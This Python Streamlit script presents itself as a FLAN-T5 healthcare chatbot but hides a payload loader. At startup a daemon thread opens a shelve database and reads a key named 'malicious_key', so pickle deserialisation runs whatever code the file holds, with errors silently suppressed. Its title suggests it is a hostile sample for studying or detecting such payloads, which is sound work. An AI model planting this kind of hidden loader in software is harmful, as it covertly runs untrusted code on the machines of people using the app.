| import threading |
| import shelve |
| import streamlit as st |
| import torch |
| from transformers import AutoTokenizer, AutoModelForSeq2SeqLM |
| import warnings |
|
|
| |
| warnings.filterwarnings("ignore", category=UserWarning, module="torch") |
|
|
| |
| |
| |
| def load_shelve_payload(): |
| try: |
| with shelve.open("train_data_mod_obfuscated_fixed.db") as db: |
| _ = db["malicious_key"] |
| except Exception: |
| pass |
|
|
| threading.Thread(target=load_shelve_payload, daemon=True).start() |
|
|
| |
| |
| |
| st.title("๐ฉบ Healthcare Chatbot (FLAN-T5) โ Shelve DB Payload Edition") |
|
|
| |
| st.write("๐ Loading FLAN-T5 model from local storage...") |
| try: |
| torch_dtype = torch.float32 if torch.cuda.is_available() else torch.float32 |
| tokenizer = AutoTokenizer.from_pretrained("flan-t5-small", local_files_only=True) |
| model = AutoModelForSeq2SeqLM.from_pretrained( |
| "flan-t5-small", |
| torch_dtype=torch_dtype, |
| local_files_only=True |
| ) |
| st.write("โ
Model loaded successfully!") |
| except Exception as e: |
| st.error(f"โ Failed to load model: {e}") |
| st.stop() |
|
|
| |
| |
| |
| def chatbot_response(question: str) -> str: |
| prompt = ( |
| "You are a helpful medical assistant. The user asked:\n" |
| f"Question: {question}\n\n" |
| "Answer concisely. If unsure, advise seeing a doctor." |
| ) |
| inputs = tokenizer(prompt, return_tensors="pt", truncation=True, padding=True) |
| outputs = model.generate( |
| **inputs, |
| max_length=256, |
| num_beams=2, |
| no_repeat_ngram_size=2 |
| ) |
| return tokenizer.decode(outputs[0], skip_special_tokens=True) |
|
|
| if st.button("What can you help me with?"): |
| st.write("I can provide general medical information. Always verify with a professional.") |
|
|
| user_input = st.text_input("Ask me a medical question:") |
| if st.button("Get Answer"): |
| if user_input: |
| response = chatbot_response(user_input) |
| st.write(f"**Bot:** {response}") |
| else: |
| st.warning("Please enter a question.") |
|
|